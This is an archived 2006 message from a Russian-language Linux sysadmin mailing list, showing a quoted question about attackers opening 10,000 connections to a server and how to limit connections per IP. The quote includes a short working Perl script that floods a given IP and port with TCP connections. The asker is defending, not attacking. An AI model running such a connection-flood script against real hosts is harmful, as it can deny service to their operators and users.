From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: From: Serge To: ALT Linux sysadmin discuss Date: Sat, 21 Oct 2006 18:33:33 +0300 User-Agent: KMail/1.8.1 References: <453A3C7D.9040103@gmail.com> In-Reply-To: <453A3C7D.9040103@gmail.com> MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 8bit Content-Disposition: inline Message-Id: <200610211833.33214.skompan@kspu.kr.ua> X-Spam-Status: No, score=-2.8 required=8.0 tests=ALL_TRUSTED autolearn=failed version=3.0.4 X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on piper.kspu.kr.ua X-Virus-Scanned: ClamAV devel-20060413/2061/Sat Oct 21 12:05:13 2006 on ns.kw.ukrtel.net X-Virus-Status: Clean Subject: Re: [Sysadmins] =?koi8-r?b?W1N5c2FtZGluc13txc7RIMTP08DULg==?= X-BeenThere: sysadmins@lists.altlinux.org X-Mailman-Version: 2.1.9rc1 Precedence: list Reply-To: ALT Linux sysadmin discuss List-Id: ALT Linux sysadmin discuss List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 21 Oct 2006 15:34:09 -0000 Archived-At: List-Archive: В сообщении от Суббота 21 Октябрь 2006 18:27 Kaydannik Alex написал(a): > На сервисы сервера,как станартные(апач)таки специфические ( самописные ) > открывают по 10000 коннектов. Злостные враги используют элементарные > скрипты вроде > ---------------------- > > #!/usr/bin/perl > use Socket; > $remote="195.248.173.111"; > $port = 5003; > $i=10000; > for (1..$i) { > $iaddr = inet_aton($remote); > $paddr = sockaddr_in($port, $iaddr); > $proto = getprotobyname('tcp'); > socket(SOCK.$_, PF_INET, SOCK_STREAM, $proto); > connect(SOCK.$_, $paddr); > print "[$_]Connected\n"; > }; > ---------------------- > Вопрос: Чем можно ограничить число установленных подключений или попыток > установить подключение с одного IP адреса? > > Где читать ? Как защищаться? iplimit из POMа не предлагать - нет > возможности пересобрать ядро. iptables & limit тоже не подойдет. xinetd?